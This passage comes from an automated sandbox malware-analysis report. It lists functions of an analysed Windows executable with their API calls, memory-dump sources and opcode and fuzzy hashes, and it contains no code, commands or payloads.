                                                                                                                                                                                                              Function 00007FF75FB9B438 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B476
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B4AB
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B4C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2485089472-0
                                                                                                                                                                                                              • Opcode ID: c9ab371ae59f2440eef835ea9f5a6e52d4b46bdcf5dc6751ca115eb4fec73a4b
                                                                                                                                                                                                              • Instruction ID: e1b6a0c5273e43d2da4f37a3a4e2c9edf112c844e2779bebbb0a090e917f6131
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9ab371ae59f2440eef835ea9f5a6e52d4b46bdcf5dc6751ca115eb4fec73a4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D118E11A0C6C6C1E760BB319A402FEA3A1AF44BC0FDC8031E94D427D5CF2CEA459770
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBC8B0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 6ab270daf2d06d3a915f511d4526503b9d356a6867b357696674190a5d8d80e5
                                                                                                                                                                                                              • Instruction ID: e7c855078abfd7e2d1c8a7ddc04f2a3800caa6febfe185775793b38cb3f90fe6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ab270daf2d06d3a915f511d4526503b9d356a6867b357696674190a5d8d80e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E09A60F04797C3EA54BF719D856FB63525F88751F485438C84E47392CE7DE8498264
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC0F5C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                                              • Opcode ID: 915aaa3ed93b8d4128247323173d346e5403718ae2162dad5d738a91136e2319
                                                                                                                                                                                                              • Instruction ID: 2805a7f71f199b7919a63d535651d0df8f8faaa608e5d86ec8583bb7a64dd997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 915aaa3ed93b8d4128247323173d346e5403718ae2162dad5d738a91136e2319
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66512B72A1C6C2CAE7219F38D0443EEBBA0F749748F984136D68987A55CF7DD156CB20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC036C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String
                                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                                                                                                                              • Opcode ID: 671599484b35d4b4192aaa78a5ea891c74b1563b76e86694b4932b584af60a2b
                                                                                                                                                                                                              • Instruction ID: 11c5bff89d49698310d222df895e618b0dfb6bd9d776aa4b0af654ed817b0c54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 671599484b35d4b4192aaa78a5ea891c74b1563b76e86694b4932b584af60a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C521FC35A08B8582D660DF56B8401AAB7A5F7C8B94F584136EE8D43B19DF38D451CB14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC02F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF75FBBF521), ref: 00007FF75FBC0351
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                              • API String ID: 2593887523-3084827643
                                                                                                                                                                                                              • Opcode ID: 65a1b59922d5a86b6fff1e689cf7982eb072f455a74a901bfcec2c6b1a57fc34
                                                                                                                                                                                                              • Instruction ID: ca65f4816ae0428ecc2d9485772434f5147285b52ca879ef28e2a0aa13ac6120
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a1b59922d5a86b6fff1e689cf7982eb072f455a74a901bfcec2c6b1a57fc34
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F01929F19BC6C2EA04AF66B4404AAB761BB89BC0F9C4036EA9D07B19DE3CD445C710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC0184 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc
                                                                                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                                                                                              • API String ID: 2773662609-671089009
                                                                                                                                                                                                              • Opcode ID: c3be5b171e42213be84837dc6e8beb978e433f47ac2927a8af97b3d08d2d22b7
                                                                                                                                                                                                              • Instruction ID: e0e6eb6e8b5921a0b52876c64f68030939fe3fd211db1dea27087a6f33544141
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3be5b171e42213be84837dc6e8beb978e433f47ac2927a8af97b3d08d2d22b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E01524A0AA83D1EA04BF72B4510FAE261AF88B84F8C003AE91D07654DE3CE484C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC13E8 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBC0E4C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF75FBC1169,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC0E76
                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF75FBC121C,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC1462
                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF75FBC121C,?,?,?,?,?,?,?,00007FF75FBC1319), ref: 00007FF75FBC1477
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                              • Opcode ID: 2268402d4a2aca544941d68e7c476cfdc96f940329a779a591f13655bab2bee9
                                                                                                                                                                                                              • Instruction ID: 3c7f837ef4e197e4e7f8bf814f3ba8dbe70e1c167c31d5a65af11b990b5aa616
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2268402d4a2aca544941d68e7c476cfdc96f940329a779a591f13655bab2bee9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08819C62E0C6C3C5E761AF35A8401BAF7A1BB44B84FDC4132DA8E576A4DE3DE941C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA5710 Relevance: 3.1, APIs: 2, Instructions: 110COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1875163511-0
                                                                                                                                                                                                              • Opcode ID: bdc7d76e4e482d0c6040e2fce28c63d16ef644c05874e5a652a5392bbb4c4644
                                                                                                                                                                                                              • Instruction ID: 293e21d231b29a90ec9096bcda8409421ce771c870c75046b2c6cbd44c47a5a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdc7d76e4e482d0c6040e2fce28c63d16ef644c05874e5a652a5392bbb4c4644
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E415D62A0AAC2D4EB65EF31D1403F9A7A0AB54B84F8C4036CB8D17795DF7CE6858325
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A698 Relevance: 3.1, APIs: 2, Instructions: 78fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: 07191cd0cb3285c77e4f7706b5cc832eef988f137fc250b0d2cd0ca272682d01
                                                                                                                                                                                                              • Instruction ID: a448fab3e8c97e0a974c1a167362b4fe54b5295c0b97df7400a86214d8179a9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07191cd0cb3285c77e4f7706b5cc832eef988f137fc250b0d2cd0ca272682d01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0231ADB2A14786C6E760AF31D9053A8B6A4F744BB8F994324DAA8077C5CF7CD894C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9AE80 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                                                                                              • Opcode ID: 2a0ebbb936c2e0efe614016c2784f352c822edb21946baebf8364a0637000df5
                                                                                                                                                                                                              • Instruction ID: 220173ba9281b2b938496c91f34f6a27d686a9faed5d594134c1ba8a982cd3fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a0ebbb936c2e0efe614016c2784f352c822edb21946baebf8364a0637000df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21C7A2F4DBC2D5EA61BA31D5053FAE794AF01794FAD8131DE4C06691EE3DD48AC320
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9AB80 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              • Opcode ID: 3a2f6b7080e796612e7954977237eb49714cffe62ddf3d76c058ee24894dddb5
                                                                                                                                                                                                              • Instruction ID: a29515a9e19c4ab3be177698f72332e23b57973d5f85a61f9ebce78d794a810e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a2f6b7080e796612e7954977237eb49714cffe62ddf3d76c058ee24894dddb5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1431B271B186D2C2EA20AF35DA046E9A3B9FB14B90F994131D95D47F94CF3DE8428720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9FDF8 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                                                              • Opcode ID: d56223552d5f0b0d712a13151417c19c9605282fb11b3c8d360de7c19b573e5c
                                                                                                                                                                                                              • Instruction ID: a49fb6ddf983553d84a6c9183c4b9a35d13220a4eb84c27d1a4317018efc23a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d56223552d5f0b0d712a13151417c19c9605282fb11b3c8d360de7c19b573e5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A115171B08B85C5E750AF26A9441A8F7A0BB88FD4B9C803ADE0CC3325DF3CE5018364
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9AF60 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
